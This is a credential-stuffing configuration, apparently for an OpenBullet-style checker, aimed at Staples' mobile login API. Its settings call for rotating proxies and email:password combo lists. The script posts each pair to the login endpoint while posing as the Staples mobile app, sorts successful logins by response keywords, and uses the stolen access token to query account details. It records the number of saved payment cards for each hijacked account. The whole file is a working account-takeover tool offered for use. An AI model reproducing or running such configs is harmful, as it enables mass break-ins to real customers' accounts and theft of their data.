[SETTINGS]
{
  "Name": "Staples No Capture",
  "SuggestedBots": 10,
  "LastModified": "2018-05-20T23:17:09.8980162+00:00",
  "AdditionalInfo": "Use Rotating proxies for better results",
  "Author": "DADEX55",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#POST_REQUEST REQUEST POST "https://api.staples.com/globalplatform/credentials/v1/login?locale=en-US&zipCode=01702&tenantId=StaplesDotCom" AutoRedirect=TRUE 
  CONTENT "{\"password\":\"<PASS>\",\"username\":\"<USER>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Staples Mobile App" 
  HEADER "Pragma: no-cache" 
  HEADER "client_id: cEU7omipe8PzK2DhUAB1QDgehAu2ez2e" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "\"Incorrect username or password entered. Please try again." 
    KEY "\"errorCode\": 401" 
  KEYCHAIN Success OR 
    KEY "access_token" 
    KEY "sub" 
#PARSE_BearerToken PARSE "<SOURCE>" JSON "access_token" Recursive=FALSE -> VAR "TOKEN" "" "" 
#PARSE_UserId PARSE "<SOURCE>" JSON "sub" Recursive=FALSE -> VAR "USERID" "" "" 
#GET_REQUEST_for_cap REQUEST GET "https://api.staples.com/globalplatform/gp-orchestration/v1/api/user/userinfo?store=true&addresses=true&payments=true&locale=en-US&zipCode=01702&tenantId=StaplesDotCom&client\_id=cEU7omipe8PzK2DhUAB1QDgehAu2ez2e&userId=<USERID>" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Staples Mobile App" 
  HEADER "Pragma: no-cache" 
  HEADER "client_id: cEU7omipe8PzK2DhUAB1QDgehAu2ez2e" 
  HEADER "Authorization: Bearer <TOKEN>" 
  HEADER "userId: <USERID>" 
#CAPTURE_CARD_COUNT PARSE "<SOURCE>" JSON "cardCount" Recursive=FALSE -> CAP "Card Count" "" "" 
